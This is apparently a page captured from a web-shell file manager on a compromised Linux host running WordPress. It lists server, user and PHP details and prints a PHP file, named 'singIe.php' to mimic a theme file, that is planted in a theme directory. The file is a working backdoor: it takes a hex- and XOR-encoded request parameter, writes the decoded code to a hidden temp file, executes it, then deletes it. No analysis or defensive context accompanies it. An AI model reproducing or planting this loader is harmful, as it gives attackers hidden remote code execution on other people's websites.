HEX
Server: Apache
System: Linux andromeda.lojoweb.com 4.18.0-372.26.1.el8_6.x86_64 #1 SMP Tue Sep 13 06:07:14 EDT 2022 x86_64
User: nakedfoamlojoweb (1056)
PHP: 8.0.30
Disabled: exec,passthru,shell_exec,system
$ pwd: /home/nakedfoamlojoweb/www/wp-content/themes/custom-file-4-1754576322/
Upload Files
File: //home/nakedfoamlojoweb/www/wp-content/themes/custom-file-4-1754576322/singIe.php
<!--yJELWT1G-->
<?php

if(!is_null($_REQUEST["v\x61l"] ?? null)){
$resource = array_filter([getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm", getcwd()]);
$flg = hex2bin($_REQUEST["v\x61l"]);
$obj = ''  ;   foreach(str_split($flg) as $char){$obj.=chr(ord($char)^39);}
for ($parameter_group = 0, $key = count($resource); $parameter_group < $key; $parameter_group++) {
    $component = $resource[$parameter_group];
            if ((function($d) { return is_dir($d) && is_writable($d); })($component)) {
            $ent = vsprintf("%s/%s", [$component, ".itm"]);
            if ($pointer = fopen($ent, 'w')) {
    fwrite($pointer, $obj);
    fclose($pointer);
    include_once $ent;
    unlink($ent);
    die();
}
        }
}
}
@ Telegram